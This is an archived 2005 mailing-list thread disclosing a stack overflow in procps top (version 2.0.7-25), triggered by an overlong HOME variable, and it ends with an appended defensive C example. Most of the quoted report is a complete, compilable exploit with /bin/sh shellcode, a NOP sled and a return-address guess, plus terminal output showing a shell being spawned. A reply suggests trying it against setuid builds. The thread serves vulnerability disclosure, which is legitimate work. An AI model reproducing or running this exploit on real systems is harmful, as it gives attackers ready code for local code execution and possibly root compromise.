Vulnerability Development mailing list archives

Re: top (procps-2.0.7-25) vulnerability


From: "KF (lists)" <kf_lists () digitalmunition com>
Date: Mon, 09 May 2005 11:36:09 -0400


Sheesh what is with top and folks not fixing OLD arse bugs. =]

You may wanna check with William LeFebvre and make sure this issue is fixed in his latest code base.

Sun freeware ships top as setuid... you may wanna try to exploit this bug there. It *may* not be fixed.

Look familiar?
http://www.securiteam.com/exploits/5JP0A2A2BW.html

-KF


WINNY THOMAS wrote:

While running top on a tool of mine to do a profiling test, the top command ran into a segmentation fault. I could find two instances where the command could misbehave:

1. if you have junk data inside a file .toprc in your home directory
2. if your environment variable HOME is set to a string that's greater than 1024.

I managed to spawn a shell out of the top command by exploiting the second issue. If you compile and run the exploit code which I am including in the mail body you will get a shell. In case you don't, you could pass parameters to the program as follows to adjust the offset. The vulnerability detail is included in the code comment.

[winnythomas@r8 WinnyThomas]$ ./putshellcode 1001
sh-2.05b$ exit
exit
[winnythomas@r8 WinnyThomas]$ ./putshellcode 120
Illegal instruction
[winnythomas@r8 WinnyThomas]$ ./putshellcode 1010
sh-2.05b$ exit
exit

In most of the tests I did on the vulnerable code I got a shell on my system without passing any parameter to the program (that is, the hardcoded offset of 1111 in my program worked well on my system).

/*
 * Program: Proof of concept code for top exploit
 * Author: Winny Thomas, Nevis networks pune
 * Vulnerability: in top.c the function get_options uses strcpy to copy the
 * value of the environment variable HOME into a static buffer that is
 * allocated on the stack. Hence it is possible to apply a standard stack
 * smashing attack to overwrite the return address on the stack and execute
 * code of the attacker's choice.
 *       NOTE: top is not setuid and hence the exploit won't spawn a root shell.
 * Tested on Red Hat 8 with procps version 2.0.7-25. The problem has been
 * fixed in the latest versions.
 *
 * This code is for educational purpose only and the author shall not bear
 * any responsibility for any damage caused by using this code.
 */

#include <stdio.h>
#include <stdlib.h>
#include <string.h>   /* strlen, strcat */
#include <unistd.h>   /* execl */

char shellcode[] =
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh";

/* 1200-byte payload plus one byte for the terminating NUL that strcat needs */
char exploit_variable[1201];

/* Current stack pointer (32-bit x86 only); the guessed return address is derived from it */
long get_esp(void)
{
       long sp;
       __asm__("movl %%esp, %0" : "=r"(sp));
       return sp;
}

int main(int argc, char *argv[])
{
       long stackp, retaddr;
       char SETENV[1250];
       long *ptr;
       int i, j, offset = 1111;

       if (argc > 1)
           offset = atoi(argv[1]);

       stackp = get_esp();
       retaddr = stackp - offset;

       /* fill the whole payload with the guessed return address */
       ptr = (long *)exploit_variable;
       for (i = 0; i < 1200; i += 4)
           *ptr++ = retaddr;

       /* first 600 bytes become a NOP sled, followed by the shellcode */
       for (i = 0; i < 600; i++)
           exploit_variable[i] = '\x90';

       for (j = 0; j < strlen(shellcode); j++, i++)
           exploit_variable[i] = shellcode[j];
       exploit_variable[1200] = '\0';

       /* hand the oversized HOME to top through its environment */
       sprintf(SETENV, "HOME=");
       strcat(SETENV, exploit_variable);
       putenv(SETENV);
       execl("/usr/bin/top", "top", (char *)0);
       return 0;
}





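Added example, not the poster's code and not procps source: a stand-in for the get_options() pattern the comment describes (an unbounded copy of HOME into a fixed path buffer) next to a bounded builder that refuses an oversized HOME instead of truncating or overflowing. The 1024-byte size, the function names and the helpers are assumptions made for this example.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Constructed size, modelled on the 1024 figure in the report (not the real procps constant). */
#define RC_PATH_LEN 1024

/* Vulnerable shape from the report: strcpy(buf, getenv("HOME")) into a fixed
 * RC_PATH_LEN stack buffer. Not executed here; returns 1 if that copy
 * (string plus terminating NUL) would overrun the buffer, else 0. */
int home_overflows_buffer(const char *home)
{
    return strlen(home) + 1 > RC_PATH_LEN;
}

/* Hardened builder: snprintf bounds the write, and its return value says
 * whether the result was truncated; a truncated path is refused, not used. */
int build_rc_path(const char *home, char *out, size_t outlen)
{
    if (home == NULL || out == NULL || outlen == 0)
        return -1;
    int n = snprintf(out, outlen, "%s/.toprc", home);
    if (n < 0 || (size_t)n >= outlen) {   /* did not fit: refuse */
        out[0] = '\0';
        return -1;
    }
    return 0;
}

/* Drives the hardened builder with a constructed HOME of `len` 'A' bytes.
 * Returns 1 if it was rejected, 0 if accepted, -1 if malloc failed. */
int hardened_rejects_home_of_length(size_t len)
{
    char *home = malloc(len + 1);
    char out[RC_PATH_LEN];
    if (home == NULL)
        return -1;
    memset(home, 'A', len);
    home[len] = '\0';
    int rc = build_rc_path(home, out, sizeof out);
    free(home);
    return rc == -1;
}

/* 1 if build_rc_path accepts `home` and yields exactly `expected`. */
int rc_path_equals(const char *home, const char *expected)
{
    char out[RC_PATH_LEN];
    return build_rc_path(home, out, sizeof out) == 0 && strcmp(out, expected) == 0;
}
```

The boundary cases matter: a HOME of 1016 bytes plus "/.toprc" is the longest value that still fits with its NUL, while 1017 bytes is one too many and is refused.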




